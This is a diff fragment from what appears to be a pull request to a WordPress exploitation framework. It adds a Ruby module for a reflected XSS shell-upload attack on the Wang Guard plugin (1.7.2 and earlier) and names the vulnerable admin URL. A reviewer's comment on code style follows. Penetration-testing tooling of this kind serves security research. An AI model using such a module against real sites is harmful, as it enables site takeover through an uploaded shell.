modules/exploits/wang_guard_reflected_xss_shell_upload.rb

```diff
@@ -0,0 +1,31 @@
+class Wpxf::Exploit::WangGuardReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Wang Guard <= 1.7.2 Reflected XSS Shell Upload',
+      author: [
+        'Paul Williams <phyushin[at]phyubox.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8725'],
+        ['URL', 'https://www.pluginvulnerabilities.com/2017/01/17/reflected-cross-site-scripting-xss-vulnerability-in-wangguard/']
+      ],
+      date: 'Jan 17 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('wangguard', '1.7.3')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php?page=wangguard_users_info&userIP=')
```

Comment:
Could you move the query string from this method into the interpolation within ```url_with_xss``` instead? There's no functional difference, but would just make it a bit easier to read.